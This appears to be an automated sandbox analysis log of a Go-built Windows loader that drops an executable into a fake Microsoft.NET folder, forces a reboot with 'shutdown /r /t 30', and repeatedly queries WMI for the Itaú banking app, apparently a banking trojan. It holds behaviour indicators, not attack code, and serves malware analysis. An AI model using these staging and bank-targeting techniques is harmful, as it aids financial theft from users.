Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessId FROM Win32_Process WHERE Name = 'itauaplicativo.exe'

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: leg#U00edvel9931-009-140.08372236.exe

ReversingLabs: Detection: 21%

Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedframe_windowupdate_zero_inc_connaccess-control-allow-credentialsread limit of %d bytes exhausted: day-of-year does not match daybufio: invalid use of UnreadBytebufio: tried to fill full buffersync: Unlock of unlocked RWMutexsync: negative WaitGroup counter28421709430404007434844970703125MapIter.Value called before Next" not supported for cpu option "chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largego package net: hostLookupOrder(mime: expected token after slashresource temporarily unavailablesoftware caused connection abortnumerical argument out of domainCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyuse of closed network connectionGetVolumePathNamesForVolumeNameWed25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full blockcrypto/ecdh: invalid private keyunexpected character, want coloninput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangepseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qrelease of handle with refcount 0bytes.Buffer.Grow: negative countskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Fi
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: _cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedframe_windowupdate_zero_inc_connaccess-control-allow-credentialsread limit of %d bytes exhausted: day-of-year does not match daybufio: invalid use of UnreadBytebufio: tried to fill full buffersync: Unlock of unlocked RWMutexsync: negative WaitGroup counter28421709430404007434844970703125MapIter.Value called before Next" not supported for cpu option "chacha20poly1305: bad key lengthtls: unknown Renegotiation valuetls: NextProtos values too largego package net: hostLookupOrder(mime: expected token after slashresource temporarily unavailablesoftware caused connection abortnumerical argument out of domainCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyuse of closed network connectionGetVolumePathNamesForVolumeNameWed25519: bad public key length: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurecrypto/aes: input not full blockcrypto/des: input not full blockcrypto/ecdh: invalid private keyunexpected character, want coloninput overflows the modulus sizeinteger is not minimally encodedcannot represent time as UTCTimechacha20: invalid buffer overlapslice bounds out of range [%x:%y]base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack spanstackalloc not on scheduler stackruntime: goroutine stack exceeds runtime: text offset out of rangetimer period must be non-negativetoo many concurrent timer firingsruntime: name offset out of rangeruntime: type offset out of rangepseudo header field after regularhttp: invalid Read on closed Bodynet/http: skip alternate protocolinvalid header field value for %qpad size larger than data payloadframe_pushpromise_promiseid_shorthttp2: invalid pseudo headers: %vconnection not allowed by rulesetinvalid username/password versionunsupported transfer encoding: %qrelease of handle with refcount 0bytes.Buffer.Grow: negative countskip everything and stop the walksync: RUnlock of unlocked RWMutexleafCounts[maxBits][maxBits] != n142108547152020037174224853515625710542735760100185871124267578125reflect: slice index out of range of method on nil interface valuereflect: Fi
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: failed to construct HKDF label: %stoo many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: CM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%hash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)'_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: failed to construct HKDF label: %stoo many references: cannot spliceSetFileCompletionNotificationModesunexpected runtime.netpoll error: CM_Get_Device_Interface_List_SizeWcrypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizepersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freefailed to get or create weak handleattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlineNtCreateWaitCompletionPacket failedfindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=http: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%hash/crc32: invalid hash state sizeflate: corrupt input before offset 1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9reflect.MakeSlice of non-slice typeunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKtls: invalid Kyber server key sharemime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largenetwork dropped connection on resettransport endpoint is not connectedfile type does not support deadlineSubscribeServiceChangeNotificationsbigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accessmlkem768: invalid ciphertext lengthcrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)'_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: leg#U00edvel9931-009-140.08372236.exe	String found in binary or memory: C:/Users/Administrator/Documents/Loaders/TempGo-leg

Source: unknown	Process created: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe "C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe"
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30
Source: C:\Windows\System32\shutdown.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe "C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe"
Source: unknown	Process created: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe "C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe"
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Process created: C:\Windows\System32\shutdown.exe shutdown /r /t 30			Jump to behavior

Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: powrprof.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: umpdc.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: dhcpcsvc6.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: dhcpcsvc.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\leg#U00edvel9931-009-140.08372236.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\shutdown.exe	Section loaded: shutdownext.dll			Jump to behavior
Source: C:\Windows\System32\shutdown.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: classiciedll_64.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: magnification.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wtsapi32.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: d3d9.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: dwmapi.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: d3d10warp.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: resourcepolicyclient.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: dxcore.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: dcomp.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: winmm.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: winsta.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
Source: C:\Users\user\Microsoft.NET\netframework4.7\version\acuradas\8pIuMUYQX9q.exe	Section loaded: wbemcomn.dll			Jump to behavior
